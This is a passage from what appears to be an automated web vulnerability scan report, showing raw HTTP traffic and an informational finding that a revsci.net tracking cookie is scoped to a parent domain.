WFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_ezPm="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9XaU6g++2ZVjEpNZvXbTc7xC8rSTKofajCoBrY4Sg3joPvt9kFbQmtJgctRy/4tu4lgXhwol4F3J4urcf4As6hj1VY7tYYI8RaaBaN6U+uIyenKXXMFkN8vM1Z/lS6m4eQU7/IgshcnZSK6JDMSomh3DjVzRQd7ocv/wij7b0mY82eE2LmbMw+cBkACTH39tJzXhLOIuvvnXu5z5kEr9MW+T5y5TkWZ1+iyAi+GF4d8BhUReCDW+rpp5r7L79DrUO5uqmRZNsPSHTuFlSVbxEOgu8kySA4QoWxhmljw0x5SVs+OKzVk+UA8L9ghBIBmKvUYAhT1PY4X67TbfbUiR7xK1bXdQ3KplN1CZ/U/GEKB0fqACsPD6Th8ArvT9qhdJFLDWTwMsIZLJOUb63Ph3/cFrPtG/dhr4B9o4RpeUWaFv8SCoqkIPD6XEHvZudoYVTUDGsS1xt01RUL5WFAigJ3VBbJ5sHBlnXsjsNBbvQR3aZhwd6dcYCNcUGVL9Onw7KW1nUNkvdUiDw7Pod9W4fF/r29PicMWtdiajzdErn7jjY+HY+umcmBiPTiXCvh5fxSyCs9qNm25v1GjX6CajqX0hz6Pnb1HtU+G9MHHQCF0JDOpj+EMkk1Ez4UmydZSI6/9Sem2Dx4WqAmWJoEHIaADLOZGKK17JFnFFy3zym2RZtTDZZIWKSYGbmjhoxaZEnfGPxsiEw6ZxVf2ari8j7po0Yumx/wvy6g+sFocC/JCh/VaK7bs801oIY0H/CmFI9hwhzKNc/+/XYbnrRXjA6nRVKEiirjF90a3IM7blj28VHyWgN4UZetwKdeFTOpRg8E31Nb98K1eoBDQ+sZTxK5W4HiPf5F3/GcQYQIATLF+kCxOmgCRA4Whg50JERwI3tl/jQoy8z4v544qeLO/WiIe3Ccbyxs5P8yAXjOZMXAHm5f/3GGMCPir4hvL85eSWzljDUAYwjB60Uwtkzuy+yiXrIp+M6YU1WwP/z42h0YnsPiZLQMoRZdjyBEUEqqIGrbCMFJqUl7ZnZg0SEsy/ipeTHvQPNGQ2vma+ZjSH/n1I65LgeSFZ6k1tukh6q4JEPBhT5PYmtLyLrkXy6jKuOxv+uTRcIUAb5iQ7PWdNb5s6ElPLO2OHdBNtOt7zXJW1qOlrqEMLKYsJT/d9l569xpsarR3ydJRCFOfcYuMckpkZ1yV1z+9ltlxAhwSanGKkHoFbADefao/fA+f/ySvc4e3awCEvHRg/rozJajzrvHRwYvN8Hw8RVzSzGOwvQyfrN3ZhatyTzzgnEFBzDsSGujQtVdLUCBt0njxlMqKQ2LyqiaKP8XvwGWng=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAxBCInYEZ/jMMNxtAxH0lsZ65lpt0Uj/e/HhI5A3TVn25DJtll/rGMjGkjVOUOed2RdW7jxad/LZqAIjd76eKMUJYJx5w+AglsacGy3S1OjAJnwO6Bvqk7yreLcKD++pKszo4LrUHCWE0l3Tjs6l1qsxjKUUx5QX1pZfG6XujimGDCELB57M6RZSXrZxkh/V96AjnGXiXf2iO7d87D8eaNOfPoYSqJqxQii/bSRqpkRFNV8KPAadn1owdPYofYRetaTA+TVSdGWqm+rnv8cusKMVrNA9oqDse9pvsIVWMhgIS48okikmUltNzr5FEQJqvkrrXuHtNye5fmS5wTorciWRsLTecMAyjm9/hcOetLrZcllINKJPP6fFsT8bRLAOr2Dzp2iE6KIOfXr9IJHFiEGJQu6UcvEK81mViIQDpQm79hqzFacfXdw4pVEaQWmx8JxvXgUrTVNfjyo1Nm2HFWjZVgDCWZz/vgwQZAsXh9ptmyEKtvZMgxFFDyBGhbgn9zQ/6UknuOyRhdx5kwXebcKCKins5hsPaXqSQ6XeUJl9g5Rg9Up1bnFeSsjT61JEWGr4dxQL7wjJWyAkQ9k1I/CM/chFqU58/h+VUXOP+hdij8prpJCgHSS4MUMjm91F6JRytT8he8bV4Ia8Q/DD5+p/eUUqZsZmTjPRso6F6SSBJK1hLuj4NZDk8CWA7mn6WVeTi+e+RC7F7P8hzVmuQxfo6UBaMLuZiUDjI4RhHh7eqk9KB+8BZqFWnYN/HZzugJrI0vy8idTiU7+33yzI8Pmt4zAbzaZcYC+FFrFGEDyrD5EN8zjoe7+vSB0rylw0Yd/wpytuMzpsmDcDy5fTDhkiMtqdr2u/tLfIW8c1Du+p46s1eIeV4wdxBg5Q4rgIeHnkPRVqOyDKFKB8UV+kPrGHpCLp2bzstXpEysIdhVffF7FMCeyCNmZ5SMulqu5u6ytLS2vueoTUSHaTnYb1/uyuSFQWeLLbmizye4bMAK/OltQjqwZwXf+c3piPfyL9HQI4A7FO7oqBogV6RjXrWd01tXkImPIoNEpIJASSPu2pB46enweqy14lHKPZCsIym+R6DQlcjdetq6wnUJBcAia1xyB+Zy4xZRKusmsZ3U8SyFwDgMyOMQdezQznbBlZp3OWPZkqQr5xtTW7GaC1cwsbTezBW+CVaecze+r7fXaCJlToBYKhbcxxGzelaaiUKZyOW2QQqVb2ogoDiCJKXUaWT4FJN6y1g8F+vgiAP+K8V1mVKNJ3FdgrF9mlrS7rc6j7yXQtSD9Q2Ryn2GcMJtsaHTqNgo18cip0oiC1T4+ZEQUbPpRFNHAo8rHAwxAflXclUC3bYUNiIrovxdnOVMbq1TfMrvgYm7RwkAmwRWIGg/CrU1GDawTmpnbAYeTT2nWGfzSYm6U99jP998YOATEZLOuL6NzUBFHWgIA4vsnEZwQvaS7cwiU+CespVsvLO3jpp5nqxOpPl4Z4AvgupTTxJjODj93XgmPGQ4osTLZ306yZX/MFMmEY20qUkQzDgziljecfEVHh3nF+KZvRsNCdf85eIgLlB1mBj3PNyU7dAkqZyMb8aq9JVCnLHXLFSgLZHd7m6HvIt95MM6/2Pa+OSo67q56/i0Tl/fRB6FxpVqNgB20pdtloGZYI60RLfAFNmvQuTX54QGrM1d9zhugoTlwtpdB7Oql9vLrz46cuSf02549u5LRtITw74V6HWBAgNknyBFLAcIpMFRde0"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+xcFRtkwLja2u1+j+YxLh8CgwMMmHLw8A/mKUpbiRg3k1iCQEDVTjL0tuOvI8mNIYh7K3EHQwhg9rTh6r1/lJMXkAZA9iyC8XdnKccC9LidpZlY0FDXMd+Xsw4jfPzK/1xeAzWwMrA/zM+SdSy8AQx9DXaeNTmC+s6HbnJ4fP2I3tgk7tyNj/CzYfV5FHstcqOop1zqPFXKfInfmwo8ON7M6w6+YxBKPqMIqbws/ZDBnp6035UglyBZNtps8MXjN8V1WG8p/Ol7HkTm5q7eShAm36S+rtbyoEYwmQ3qLbPZNP4Ya/C0BTx+G78RIbKR4+rBx9Jj4NGZauHeSlO3S1HjhCIOr3JpUNYlbfpi0IG10pvSNzVFoEg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLwKIREfXDY7ViGzONef0liDtqNncA2iFgL2LcmTUz/xw+ppzybAZxKwWQY0UUnQiG5kFQmZoeI+2ZBSjkw/QKBeEE1xCXKzbX6BtHZFDnD6taOUzkZssC9SmHYB9KeGG/XzENTIKkCoUUZ4/wp7/xZIJqCDRJxxA47nJB9Xwz2W1oW7yZVEh7y/CXlCsjZg2b1BrZ/rYVa7IulGT084e0l4n30SghEbDXoaJXhjriypIHg/FEMsakEZ21tqC1IR0TAJE8L3JOhIxn+HciQF2mHnVgpdKWhwjQw5LGokyTcjv/ole3kAgyg01uv0UTvZOVMEDmiWOqkH0nGkrdVNsS8f8urLmG1UX1hCiOaB1ffI2tchDu+MOABggAS4Em/QKFAMR40MgzBcQCyEyLT5Icxv9GNAvG0EEkjiWmCmzx8iEvQMNNobKY86AmxfF0Vkky+sy3xtb5ziRTXOPO8h2SM8u/GqRdNOa6JTPKG786KGVIr3UPetLR+8KjuUaUzDj3mfgF9zcggYMGL4e8jDJ+77LnuApfS5T251pJOp39UNYld2V4pabM31sBTeYPU3jQSGJN/7Cv1D1ppac7z0ux+12aq36lBvZiDAqONmiLOgpLAIgPmP/9FGpoCg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:51:07 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:51:07 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.122. http://pix04.revsci.net/I10985/b3/0/3/1008211/118546994.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/118546994.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/LhztKuWrz1dEPG5Xt07bn2X4Y1WNOeKX+gFaj+QEzDd7lDX0r6uuE6KEHUTV7VrJfYQc8j7ixrfHU9uQwGvbx7nRS9kOyODH0/l/KPGV9m3O2z1pYNIuFGQpkIZx0ZFXv/oUdXx1+hQFPbRtkGUDxXUi6CBi64g+YpZpA2k/FgE6FJQwneNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:17:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/118546994.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_qW9_="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4llhxoQ3e1svCK92NbndG2piitFk5yhzPkfg8jzcWlRiBwIrTJQ1VzzEycP7TsZSrmbAXquq2sSwsQJOUcj2UGm8VSkIxV9xfIE781mc/TCJUdbSx5FayJIdytouWwKLI96fwa1eIFAH8PTaDnKFm0F75mmIPzgA1NDxMg9PYeYOF8wT52fNFPAISEGi4AlK9+bacmO9xJJLSMj9VA3Ws0SHaRdB/cMH4tcyPQ99Rl8Dc6Oad7iwgPC7cPEBw2NrlAcZR+Xh/sIHvv3DS/DzxmsseQIvdA6QSnvMJJ6zu4B2vxl8laNE69KzxON0DZajpsFf6y8SjsaOKSxJWEN0FdDU4ianrr4sC/3EW5zDig8m69bYeJ+Vb6rTq7ECFvDWLKjIZtrqwpSko35frcV+VBQcqtVnLbjU2I0tJnwFISZtCCpggmlzBb6Kv2ZhXAU5OV1JeQRwCt2lxKu7v1gGicIg8TewI3ilj7ddB58kbOovu35/FQJvoxfYAm1UAdiu5kCXtyq/wdfXcH0bR5zOLMD26jBWfmbcWS1uSLyQeAaZpVYvT7/cewcDWKnsW/QcTwfJswG/xPTVz8bF5uvvVM1p+N2YCf5sCdGAOarnPk24PByDJ0iGgLP1ofETat7Rwdklyk4Bw0GZYdg8I3ZVFHJwUUg21dSyBaGjQlEwjDJb9r/o+24PmM+yyZnBzd48PtT7MJaAjRKs+jlMPcsygm6EF6PujZVqG5r0HXDc+B3wtiCvc/VclLrQqZW5/4nM/XTtBX6OnZbSgfW+mgL7xBh3lh5IheHeDUPmNUJlRz119ioNxLVNN5D2uMpFPqqXHbrCCZ7kbm11CU3DcIT4P6CDoohRwvTmGnBO1UxP31eiFvQryFjp7VIWEo2P/jhGEIJ0A1Bq/ilazcW/mTHXVBfxfs9QIt53wuzdjZYMMikbSRiA8j1hlmUMuiplRzSe+fmrSDaeL84AkykOlfvVKOwuAGKIX3ncpO4CJ3DwiwVfc9p+Ct44zxWd+t5DeSUFoHDMH2UTIg4KOPqsK/7puoeXCVQBy9FT3pKZvFaajYBrbun0dzjwI+dPIaE12xV2JwN0VjfL5f3/yOosBB3QMuZRKHCWcFuMIMmmVE/iudJUTwaYWMimupABKgJEGT+uDq/WPU3dy7QCr/MmedbUut7XRz4jRQx/oRKsNgzBeVM0lF7vZcCsSFWpO5IWWs/On5MQ+/PCftKo5QdE9/i9rW51wGEJyA7EHMC20nBW2EuLkF/2MO0/Qb37AgH5OzNFx/EOCweAh9VF2EpXh7It3yfEJJfR"; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8q/n8RHJiFTfZw+jQwruBibDv6FE0by7wXSZvkf9C+pfrDxU705cIFGcmpbl76qyAEMxXfX8x6Xcpot+zgVaZYq1M95vlSsvZIAJNgAjiVIWy36LdaahH7VY0QbTZ5R+dnWDAc1Pbw5/D6RTLvJHembgsXY2UxU4NpeUlqGPYPHHIaLif3c40dcaYs7U7RoG6HLIB4TPLZW1UoBmdUm57C2U5BX5ZM2ZEdlX0BGaM7JVuubnZa2kklur5r41CujbjGfD37FC2FGkTHdXu/hT+6DUE46e1hUKp2JuL2Po6aztCuPxW/8y0zYtH/1XhYzRIK9j93s1xFHiYTpQfD/BZCEBrDobN712wvGrFEkgv5XmRnO7nEJTpLqLPKegxf7m1YchNbT2MBOK1DIDnjjsW8cpF425R7BYId1+isxc03+RJWyTaywIkKT24HDV6hm8wus8qph87F8Teu1aat7BMNkboNZZMetXWDVubPBDbmcC7rTZsTPb7b0sDjCOz2T1H7KR+CdA8yiqFSN5+J5K0vBE0YYww8om+6DqE2jShJj/S6XlMCOZSfM9h+VEkH86l0UsmKM5P66ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUGE1dPItvG9DmNtzGtDofQcmoV6I26YtqH6q9OHEB7QzU3wNY2jMJo2bFNyYwASaliNRrHo2hlp4O1YbfqfnnfnrtYJjMMaZq+kZ3hYJNyQcOQyP1GczinmyKXtOQlt9OjnyjC6LA8wBNQWF7g+jCIqIp0AaoNgXKncwDF/Bhs+k4OD5OLvdbhGZ9RY83aHoDhXUjg0din3OXqt1YNQ77wsWw8GrOnHRih4pN5AGPMwk+EIQ2IEo2vODtNaHgiO9jLdK+MSFl7A/LqTBidafZZPp66JyNAcGnE3fjvJ5Iwv+zBhAOoGwLwmHi/7gga/7zkITMFuOa2ddaqPZtEhaodMYXugDe/2BwcaSDZRWVhuml4qmHqE7+hxW3cQYwNo5GK119XpLwbP5I7zLV2DiI0KjNdUAHylvr1LcOKoAK60KkJzdKe4745ER3JUUeff+Zmum1Etnk46G76zyAvu1lnPpFEMhmPPYIlSbRNR/aZQbjh5FRN/qdZWyfnDBdiNquVzCBWzwdmbP3u1fGaSKmUos3oWivlZsTJEnSN4tSZMW8cG4Up9BlzTCo82B1sjyAkVzESmG5FO/GmwZy8OgO3I6x4SNGq/+hj8oBSjJNbT+Y0E2To+plyQJ+Bv